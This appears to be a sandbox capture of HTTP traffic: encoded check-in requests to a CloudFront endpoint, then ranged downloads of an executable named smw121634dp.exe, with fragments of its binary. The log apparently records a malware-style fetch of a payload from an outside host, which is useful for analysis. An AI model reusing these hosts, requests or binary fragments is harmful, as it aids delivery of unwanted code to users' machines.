User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9kADtTjf7A5aNO6KYijkZhmOQNlnkg==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:57 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 3ccfbae98f5816b531634c1e82e452
59.cloudfront.net (CloudFront)..X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9
kADtTjf7A5aNO6KYijkZhmOQNlnkg==..
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquvcTB46xWnxTle2fwOdHS0Y4G r 3F6T7bkBEy9Iv l4= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kH9M4ekPufriambI8C0A_aLFK1VYvCRfBp-wq3vJiPyl1FtCKAtS_A==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0S8KGBuGMkqPy9cBQgxTzAdiRAmoEFbFBGUTLOwoi8dlWjrJo4koLw==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqubz0XqPn9zR0IiyFlsxNmPbPiCC4paVhdpvBRerX5l2CaTGmM9zHPWA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2YXlRet6tnFPhmM98-RqzfUyCCRYZV4i7Xhs_vNWHDiRubY12AoB8Q==
....
GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pM6gKn8h0qT3aBcaoZob0e9Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPfuN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:58 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 3ccfbae98f5816b531634c1e82e452
59.cloudfront.net (CloudFront)..X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPf
uN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==..
....
GET /p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FLVgKiMRIXIw65z1htvDBY1YfN1U0R9J56DzZNT16K0TYEc46BPLLg==
GET /smw121634dp.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:01 GMT
Content-Range: bytes 0-249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: B-NB4C4upWTh9sx666RTwKjdFQiz_aRLPfClxajzrzhk1p5aClqPpg==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
........a.4......................................s..........`B........
... 3.(............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@..@.data................r..........
....@....ndata...`...@...........................rsrc...`B.......D...v
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@
..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u
....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..
Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:03 GMT
Content-Range: bytes 250000-499999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 8cGGfGwRI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:03 GMT..Content-Range: bytes 25000
0-499999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab53e
8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 8cGGfGw
RI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==...ny.q..{k..........
.U....j..0[...2.......;\..L.....T.Q....Z.^...$A..s..)O|...u$....}.{q..
..j.....c....|$.~..k.x...z...K..C^#.....! 8.].!th..p......L...\.=K.m..
-.h.L.........w~...X..M....[..S.{. .ek3.VeR..Y.^.QaR..C...[t(..i^.N6..
.j.O.YGs.<)...x.x...Y....R....'.7..rt.].....d..A....[sym?/...T....w
h.......`.ww...kO.T.i.ep4O!....T.f.K.[..T.5...;.K...?...W...n\..a.'.t.
.-.bV@..W8PK=Q.....<.V@xZ...S.0q@iw3}BEi.).=\."Mm.>T.eL.....~...
.r..;....@.... ..Qu.......rP.U...s/*.[..i..j..!.*..u.H...GX....O=..V..
..m.lc.....E.][....>......@..&D..n.B)....db.=..7..Q....g...<....
?..ipU...\.F.Y.......K..9.......C........M_.Z_<.R6.......nO.....y.L
.Q...K.R";.|.........r.%..j4.1.N... .....B.o.@).*.>.H~N....8..r{M..
.w.....S0../..s.\...}..w.~...b;.Sw.L0.;D....Z N.E......2.B.6(....X..UZ
.@..O:3n.S...U..9. .jZ0U....O..v.........":j*..^~...............6.....
..i%.. . o.8..|.....tS).E..g.h#.O..#..\....L,.:..c.....1._'. ./.Z..g.v
]:.8xs.o.1....q..l..;....t..ZW....B..........rM......G......S.....
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 750000-999999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xv60FsoCinZiXNy8Zd2f8DEi2-0SNRbuelKIwqOuswlbv7_QTYlp2w==
;..M..........H....V......\.........l1-.%...z....NF.......0... .e.2...
..F..>d.[.....v..TLN..%...G4...?.6..*<Y.O2...\&GNH.].4o...f.^o..
..g1L..?`......*......R......v.;a;E...Tm......P\~f.......X.:....\...@9
n.......@..].>.....=..`....T.cE.G.....U..l6..0....2....jH.&...wY..1
.zVn.T.R\.).*..nZ...m4....[.&5...V......j.....!.4..Np.......M.<..@7
..H|.'b......O..R....K...(V.kI..(S\...Q.Q.M......n.Q.<..3....s.j.b.
.....,.....f..n.LH..%.&PT KWK4....b}.'K..,L...)......u..."..}i....z...
..1b.S.i.K....)E...u.M...c%.sZ.c.Vf.....@.i.0.....a...L............&..
.2.3....*..<p....MM'.s..-b...M...Y@.Z......i......aTg.........tPg%.
............p...i..#.T..._./q.A.B.......1.........(.(.$!.i[./..$@..$T.
.b..b....\a7...5=3...!..:Z.[s.KBY....,.........P.|.}m@.X...f|..]...#..
..8W..]...s....q..f{NA..>A.n@#...=.S.j(A......1..;.F.*.M. .^_s .x.D
%...x.:..6.%.<..K.f.SW..o..=.A...|.&.0..(.D$.eb7[9m=7}.0......km.|.
"7..K ,.8.6.Ai..6.?.....mf...8 .Rl.wj.....,..d.k...6.f.R:..4/1.=...xp.
....9r1.K..z.j.W8.....$....."..E..(.c.B.^..r.??..c.B..cfp...z........d
..-........f..bP"K.=...9lJ1...|n...;Y_r\...{.Bw.)...&[....~..7....y`[.
.r....i..!...........7C.~..../y...B....^...._.;..N....Y=.tUYU6..hX..o.
.2.9......3"..a....F....c...Q.@m..^/\H..s....!%...y...ST.{...U....a..h
}N..7.(.V...Fy.....Ufu0.g]fOd.BX/...W......P....i$.f.\..h=.1....^..erB
........a..1U....5Q.T.c...x... ......S.z......Ep...`...-E.. I......uJ[
.1.O.>..t..5.............z.........8...2Or./..&..M....V7R..........
l@...N_....h.:e..aOd7...V.a\.J..o..TQ....t.RY..f0...R..'....4.....
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 1250000-1499999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5qszbFpfEM6_n_SHqnSua2dClwcYhoalNqftFuUXQXLNifKQ_LQnmQ==
j..8|..R......4....I.rw..*V.....X.........&.|.D'.d..)2..#...e....R0.i.
....580.n=..o....I...q.U.4.o"F.....2J.A..P...0..b..q.Rz.}....n..5.q.."
..7.....B...T...Q...Go..Z`d.E..B.G....CY...Q._Pb.A...5.[......\../W_}D
.}..-5P...=...|..%w{...........Y.T,.H..J.1..~D..f..g...|..z..@.B....e.
G.2X.*......3..fpv.]A......].{.E.X..h.Cu ^@.$&.?Z....G_.......M.q...Pv
.......aa..i9k'd....W......c....P;;.......}%...r....r...I.UE(.......N\
...VV~..c...w........>...,.l...*.4...........ye...qD......t ...>
..@........^..M.....{.....\E.z....s.e....n..1.}..^..V......:H.A.!..i|.
G'@....%........@.'#..dI..Jy`.9..'5..Fj.....F.j[..;.s...]..P...5...W..
..\.>.|f.?.............!.......|B.q...w......*..B...x,];./..m.}..kl
.L..>>\...ml&..fO.X.Ue....2....S....{.]k.Q..s.].....^..Jj..../.b
`...k.@C...Z.rE.G..>.8.={...v.A.w....(._..T..l.J...AgC.....T.....R.
.V ....IX&.!..g....Y0.......%...R..Tm.( ....AI......_.D..||.*./..<.
5....}...JC.".....J......Uq.A.-..J*..P.V...x...C7....]. ..c..-@9h..?v.
q.]d!..=...3....V.Zv.oT..c...d..q.&..rP...l:......a9;.j..........f.3..
.AC...w..E.tPS..~...[.{.,&.\.r$&......-s.......A../..l...9..[n......5.
R<Y.q.......r..$.UH(.pw..Ob.N..Q...,W0. D{l;...j.W.^.(..)gg.?....Z
.....8R.h......4]Q.g{0q...PZE^..sL..-Zx.v......k"...e=.(?.<.m......
O0.K.aY......u.<.&.O.iX.x..=.]S..$)....q......7...h;.....f....*O...
.x....N.gP.KA..`..X.M../...........MCZ...4..........M.....h....xx.D&.
E.\I...Kvr.nn..l.v.c.nqd..] t..!...4....]...{O..O...-jO....*.C...;h..*
<....Q.r.F\..#C...H......~.|...r...{.....2.?....?.J).........Z}
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 1500000-1749999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: A1qcf8jMm6EfdnLBl4pfkuyLfq9M7Uqf5dGsKlmAbbga_l7uEdSQdw==
.;%...F..u.......e...2..91HT....jS.@.tN,...:Ql.....6..Z....7..(y".X...
....r.....1X;....2B......;..Q.w.Y..T1....i.j...D<.}...]...4.....4{.
.C.\..>.8r....w|./....{.R....(EcW.p5?$.u.-T~u..x.....vL....'..C.jW.
H....S.........D4_U..{..P.{.^.g...)t.....%.Z.z..}..Q-...y.T...5}..Y..8
.CL....q..2. )D".J.....T".!<bITGCR......EI...#...].$.n..}q.#.t..3.F
.....:.I.0y.hV.V4...|aE.y..]Jn..7...<E$.L.?XS...si..az=...# t...w..
dkJ..|....9.>....l....yX..9.<.e......L.rC1....e.}<.~..bT..M.h
.FFuuF.a..?X....C..{....v..`..}.i..........`..{.:.G..._.$KS..vu.... "H
./..D...../..........C.....>...|1.kz....a..d.......@JE!...iR.v.....
`..h....|.......l......1..n...(I.......vLX.S..nN..<.......B.`Io.XR.
..[.Qs..Mp...'a......R..\.N..j..y.....3.H..P...^j....5..U.....P.o.X.jo
.......3..Zw....1............y/"...e.X.a...Q'^9m..Zm(D8...P...#E`..^).
."...Sm...N06..f.V......w...2......r.,..4....{.....<..y...7..i.....
...@R0zJcMT.H...D..&....rU.&...kC..#.._.t'r.6..i.......P...w..'0".Z...
7...D7M.Q.6.f#.......;.<1.=.D.q....o...7G.....R..%n...{..-_......@'
M.qV."n\,..7..N=V...)... .bY...........X...i.B.....;E..H'..P.UH".V...y
....{n...M....q.}.O...F5 .....E.F..../....z......8...X....X...b. :a._.
IG..,...k..{..."!v.a..p:..s.P..>.2._..@N..CeV........1..NbHe..}. *}
..4\..u8'..`....f:....qK..?.......3.#...&z.NM......>...}........6-/
.R<.I..t,.*2a.Ld<.s. ....r......`0..*..$.iWdu.X.dA...8......XD}.
..~uJ..`x.]S........_....%..D.o.w....y...n........O^..QH..%...PF...._.
..l.....W........u..U..1...e..z.'B22...7I...P.A.s.<.@...^.y...4
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 1750000-1999999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: O60HVq8xryQtoELtUxkF8_4apIxdbPGzEchY3NXfaSwuRUB2_efYeQ==
Tu..r..S...}....8..!....*..S?}.w.T.*8.......<...P..YQ......,X......
.BWC....`.J|... .......2..y].......Ds...x..^...b..,......z..]..wx.....
<...jn.R..o......W`.....'3H9....;....4..o.I....tK.fy..C.<...g...
..[..c.).".m..)....s......Z...j....v.5. .f.oF...&S.....G.-.~.\....c..^
.B.a....p.......K`..Fe..Z|..y. ..jp........0...... ..........J7..5..x.
N......N.... ....R.....Z.b....... ..N.W.....b.p.......pe.S...1.v9..1.m
-lC..5...8.n.@..P...^2....z.@. ........B......V..2..}.<.^.R..1"....
c..W ..%4....'l5&r......n.........I.7....s5...@..p.o.g..=.=.1.R...#..2
.j....E......!@..zG..Y-...8..g.K..q..cV...4...j.w.....i.... .W.B.f....
~..=Z...iEL...v~M...)....g.M..680....p..7.`a.....P.fVsN0.^k...h.8.qh..
.7.4........t..z...!..u.6...%..R...<..;.}Y..p....K|.........x?..,.#
:L....'O*..P.}...3d^..-?....u...L..{{.(.f.]..vptU`...../......>..3.
n7.o_....b. .GE^..i.IR.:.S....'..........q...m...._.T..l..R.....2..'..
m.....`..X....(....v1.c..........d.bm.\.........`.E;[|..%%e.m.....jUZ.
..n....! .{4t(u...<...>0G....Ub`.T......B...x.....Q..-s.{....,J^
e...1.]..56...9/4....)c.4z*~.GO%>T..5.3^....)....xvP....^40.;...J..
.!.9..G..UMx..d...a%.*.,..%8......}.V......! .`....N. s-...u.....R..1.
.......Qg.\E<..9'.....R...F..L.c..k..xq< #..ss..d.f.&..|..a..,..
IT............y...o$.&f..b.~%..TI..]@...~....|Q.'U.Z.o.{.!.K.!...<.
0......MX/...nP.R.LxL.-.wO...r.U..G.......>.......&..H.....C.-\..H.
..q...T&.5"....#m....&p.....B..,.{....,..%.4>7./...9.nf...#.P..y...
.<.H...A...fP,....J9[.......f'R...9V....LL.3.59..D...c@...].U..
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 2250000-2499999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 61z2GHNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 22500
00-2499999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab5
3e8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 61z2G
HNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==...g$.X.#..2.u&..r.
Q-.......r.=..$....J.....1M.#uQ$..M.XCe..K9Jk].w\.:. ...c.....\.......
....{.s.E}-o.|..KC{`..D.=.....5..S........ .c_-..yN.6.U........4.....w
....)=!.b........!.q...@.....;I.>.......7. j...n...cjD.cs..(.....D.
.........n....(.mc!..=......$.........a...CPaw,r.*....}.V..n...E..oW..
l...b.....:o.7&.(............)...H...=.R......5..woY..O1..[.%1.}.. .Yq
_....Q..Y.8.I.....)..WU23m....(iMJc.".8^.<.e.S.?.D.6. ..m$K..a.....
G....c.Y.......F.A.DuEP....<........x..P8.s$..0.J........=..@.D.$.|
"...:..W...a....<...qq....S..,-.5O2"%-....Uah..2.......dJ..|Q....r.
.`C.,....Wp.]...S....tX;D....sP`B..]..0..Zq..SF.....<r.T.6(?..-..qK
~j`...........at....{.^.....N..b....MO.M....t1..B...sj".......Hrj.|..y
j^.Fq?xJ...;..d...0h}<].R.0......p..k...w.a:.A....{.z.AN.%?5.}...\*
w|/=s....T...n.v.&...}.Z.sf0.u,Ls.....R.BS..v.$Ao$...$.'.kh..)@....j?.
.2d..R....j3]x..js..nQ_EO.u..Vt..(..m.....[.0...=..xzfa.._W.0!{.....9?
..e&.....e..YB.jG<..q Fc.N..C%*......../...c..G.ab.6.......U.C.
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:08 GMT
Content-Range: bytes 2750000-2999999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: PbnrUwqUApr6PQSXhWpG9mCaD8OZ9r3J7nW8I5ZDgeRhArGZtOc_dQ==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:08 GMT..Content-Range: bytes 27500
00-2999999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab5
3e8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: PbnrU
wqUApr6PQSXhWpG9mCaD8OZ9r3J7nW8I5ZDgeRhArGZtOc_dQ==....@Q... <.....
&*..N@3...1....&CJ?..,....\....j..~&P..,p..l1....ssI..`..b9....#....cu
.....,..iWQ.....feG7..n.E,...yq..Nn....JUK..j......D.......X.R...Q...m
P.)...4.5.(....h.i...d..].c..#..q8?..K..i......,i...?.q=...z.......w.u
.#.....C1...4...O.8B..B.k...r.....G.......b..a.b4z..W..:P!..a..@...Z#&
gt;v..P.5..8.....M.8.......p/.VZ........e}...o-R....8Q.\...4{.3......,
..{..a....R_.........B\.x..J..M...~.AB.n.#.... .....RC..zFm...H..-.;..
..K.T.UR..9..=.%.6.).r0.lYw....)........y...3.......Y...*.Gw..Z0.c....
..S....sX.mA.........Dt?...4....F.o4..5..V..B..5./.4.5.)Z.7..8.m.K.a..
u...$....x......p.....\.;..Qx.%.......&(q..........W .....1[...c.,....
r.H....u..M..G.g...`..?x..<.w.YNe..]'.dWT'!...o.....m.Kf......w.1.3
.HW;... .......{d....U .c.x...1...HS^.qc.t...]a,.<.TOs.Y._....d ..
